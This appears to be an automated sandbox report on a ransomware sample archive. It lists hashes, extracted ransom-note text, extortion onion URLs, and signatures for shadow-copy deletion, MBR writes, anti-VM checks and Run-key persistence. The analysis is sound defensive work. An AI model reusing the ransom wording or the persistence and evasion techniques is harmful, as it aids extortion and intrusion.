Analysis
-
max time kernel
379s -
max time network
383s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-10-2024 21:38
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00403.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00403.7z
-
Size
60.6MB
-
MD5
f61f92161d115bc21c47483258803ca7
-
SHA1
56c8ce8f2a6104b40f1a88d1b42f083dad7a9de9
-
SHA256
8aeb260c2e350147f992e73b8f6fedba94fd04d12e8a2ba3e4ec8500baa13830
-
SHA512
25e5061c1ed6c457c7f46bad5f19b27369dc4409f40c02bc2f63e39d102aa54a1ed7532018ef8a8c3469e574daf1c6ba8160c24ea5efbeaa8f5b97dfc63fe173
-
SSDEEP
1572864:xLROHSmpHJN4vOB7FHXhWZHEvM33yiUY92Y3FCC7m9tx3Yrr:NROySTWw+yvwita2E7+tx3YP
Malware Config
Extracted
mespinoza
-
ransomnote
Hi Company, Every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data back contact us: [email protected] [email protected] -------------- FAQ: 1. Q: How can I make sure you don't fooling me? A: You can send us 2 files(max 2mb). 2. Q: What to do to get all data back? A: Don't restart the computer, don't move files and write us. 3. Q: What to tell my boss? A: Protect Your System Amigo.
Extracted
F:\$RECYCLE.BIN\S-1-5-21-3227495264-2217614367-4027411560-1000\Readme.README
Extracted
C:\Program Files (x86)\readme.txt
conti
http://m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid.onion
https://contirecovery.info
Extracted
C:\Recovery\README.d96d1f6d.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Extracted
C:\Program Files\Crashpad\attachments\Restore-My-Files.txt
lockbit
http://lockbit-decryptor.top/?8841DD9B0AC925FF9D181C92893BBBCE
http://lockbitks2tvnmwk.onion/?8841DD9B0AC925FF9D181C92893BBBCE
Signatures
-
Conti Ransomware
Ransomware generally thought to be a successor to Ryuk.
-
Conti family
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Darkside family
-
DemonWare
Ransomware first seen in mid-2020.
-
Demonware family
-
GandCrab payload 2 IoCs
resource yara_rule behavioral1/memory/3448-139-0x00000000006F0000-0x0000000000707000-memory.dmp family_gandcrab behavioral1/memory/3448-138-0x0000000000400000-0x0000000000460000-memory.dmp family_gandcrab -
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Gandcrab family
-
Glupteba family
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Lockbit family
-
Mespinoza Ransomware 2 TTPs
Also known as Pysa. Ransomware-as-a-servoce which first appeared in 2020.
-
Mespinoza family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe -
Modifies boot configuration data using bcdedit 1 TTPs 3 IoCs
pid Process 5540 bcdedit.exe 3656 bcdedit.exe 7752 bcdedit.exe -
Renames multiple (1592) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (4445) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (5639) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (9854) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7444 wbadmin.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\gmreadme.txt CyberPunk2077.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2408 netsh.exe 8584 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation CyberPunk2077.sfx.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe -
Executes dropped EXE 31 IoCs
pid Process 648 HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe 4728 HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe 1824 HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe 2116 HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe 2080 HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe 3128 HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe 1056 HEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe 3448 HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe 2792 HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 1264 Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe 4996 Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe 4736 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 5520 Trojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exe 5044 Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe 5908 Trojan-Ransom.Win32.Foreign.nmxn-a7c1706b88b29404d24806876ad8b4473d2f515ea517605d8568c6f1c686b594.exe 5892 Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe 5444 backup.exe 5472 CyberPunk2077.sfx.exe 6072 Trojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exe 1324 CyberPunk2077.exe 6876 Trojan-Ransom.Win32.Gen.yfd-5dc8fd209538c67f0a27c941047bf4349354ca41bd2da45683890f0a2da9a7e6.exe 5800 CyberPunk2077.exe 6448 UDS-Trojan-Ransom.Win32.Encoder-63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be.exe 6948 497D8E.exe 6128 Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe 2984 HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe 8636 csrss.exe 7868 patch.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe -
Loads dropped DLL 54 IoCs
pid Process 3128 HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3404 Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe 3128 HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 3128 HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 5800 CyberPunk2077.exe 3128 HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe 3128 HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe 3128 HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe 3128 HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PowerShell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crypto\\PowerShell.exe" Trojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PowerShell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crypto\\PowerShell.exe" HEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WispyDarkness = "\"C:\\Windows\\rss\\csrss.exe\"" HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateHandler = "wscript C:\\Updates\\h.vbs C:\\Updates\\Exec.bat" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backup.exe = "C:\\Users\\Admin\\AppData\\Roaming\\backup.exe" HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{FB6267AC-E377-3F35-E7F4-6404CFE16080} = "\"C:\\ProgramData\\{67724F9C-CB47-A325-E7F4-6404CFE16080}\\CACD9F03.exe\"" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Razor 1911 Uninstall 497D8E.exe = "command.com /C del \"C:\\Users\\Admin\\AppData\\Local\\Temp\\497D8E.exe\"" 497D8E.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\Desktop\\00403\\HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe\"" HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 5296 powershell.exe -
Drops desktop.ini file(s) 31 IoCs
description ioc Process File opened for modification C:\Users\Public\Downloads\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Public\Pictures\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Videos\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Links\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Public\Documents\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Public\Music\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Public\Libraries\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Searches\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Public\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3227495264-2217614367-4027411560-1000\desktop.ini HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Users\Admin\Documents\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Music\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Public\Desktop\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Public\Videos\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
flow ioc 349 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 336 ipinfo.io 337 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\CertEnrollCtrl.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\fontview.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\netbtugc.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\setupugc.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\wlanext.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\@VpnToastIcon.png CyberPunk2077.exe File created C:\Windows\SysWOW64\LaunchWinApp.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\cliconfg.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\clip.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\eventvwr.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\PickerHost.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\ReAgentc.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\Windows.Media.BackgroundPlayback.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\winrs.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\cmdkey.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\hdwwiz.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\msfeedssync.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\sdiagnhost.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\Taskmgr.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\user.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\WerFault.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\IME\IMETC\IMTCPROP.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\autoconv.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\cttunesvr.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\wscript.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\CloudNotifications.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\cscript.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\efsui.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\ieUnatt.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\mtstocom.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\systeminfo.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\verclsid.exe CyberPunk2077.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File created C:\Windows\SysWOW64\gpupdate.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\wbem\WMIADAP.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\MailContactsCalendarSync\LiveDomainList.txt CyberPunk2077.exe File created C:\Windows\SysWOW64\@WirelessDisplayToast.png CyberPunk2077.exe File created C:\Windows\SysWOW64\CredentialUIBroker.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\dplaysvr.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\SystemPropertiesRemote.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\wecutil.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\wevtutil.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\wiaacmgr.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc CyberPunk2077.exe File created C:\Windows\SysWOW64\@AppHelpToast.png CyberPunk2077.exe File created C:\Windows\SysWOW64\explorer.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\InfDefaultInstall.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\iscsicpl.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\OneDrive.ico CyberPunk2077.exe File created C:\Windows\SysWOW64\F12\IEChooser.exe CyberPunk2077.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content svchost.exe File created C:\Windows\SysWOW64\gpscript.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\reg.exe CyberPunk2077.exe 